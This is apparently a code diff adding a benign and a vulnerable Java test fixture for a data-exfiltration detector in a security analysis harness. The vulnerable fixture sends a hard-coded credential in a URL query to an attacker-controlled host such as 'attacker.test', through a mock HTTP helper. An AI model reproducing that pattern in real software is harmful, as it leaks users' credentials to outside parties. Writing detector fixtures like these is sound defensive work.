Dynamic (#77)

tests/dynamic_fixtures/data_exfil/java/Benign.java

@@ -0,0 +1,21 @@
+// Phase 11 (Track J.9) — Java DATA_EXFIL benign control fixture.
+//
+// Models a hardened outbound HTTP call that gates the destination host
+// through a loopback allowlist before issuing the request.  The harness
+// reflectively invokes `run(payload)`; non-allowlist payloads (e.g.
+// `attacker.test`) short-circuit before `NyxMockHttp.get(url)` so the
+// captured-hosts list stays empty for the differential runner and no
+// probe is emitted, clearing `OutboundHostNotIn` for the attacker
+// payload.  Loopback payloads (e.g. `127.0.0.1`) reach the helper but
+// the captured host is inside the allowlist so the predicate stays
+// clear there too.
+import java.util.Set;
+
+public class Benign {
+    private static final Set<String> ALLOWLIST = Set.of("127.0.0.1", "localhost");
+
+    public static void run(String host) throws Exception {
+        if (!ALLOWLIST.contains(host)) return;
+        NyxMockHttp.get("http://" + host + "/exfil?token=alice-creds");
+    }
+}

tests/dynamic_fixtures/data_exfil/java/Vuln.java

@@ -0,0 +1,17 @@
+// Phase 11 (Track J.9) — Java DATA_EXFIL vuln fixture.
+//
+// Models an unguarded outbound HTTP call that exfiltrates a static
+// credential to an attacker-controlled host.  Java has no stdlib
+// monkey-patch hook for `HttpURLConnection`, so the fixture calls into
+// the harness-supplied `NyxMockHttp.get(url)` helper.  The helper
+// parses the URL host and appends it to `NyxMockHttp.CAPTURED_HOSTS`
+// without initiating real wire I/O; the harness drains the list after
+// `run` returns and emits one `ProbeKind::OutboundNetwork { host }` per
+// captured call.  `OutboundHostNotIn` fires when the host falls outside
+// the loopback allowlist.
+public class Vuln {
+    public static void run(String host) throws Exception {
+        String secret = "alice-creds";
+        NyxMockHttp.get("http://" + host + "/exfil?token=" + secret);
+    }
+}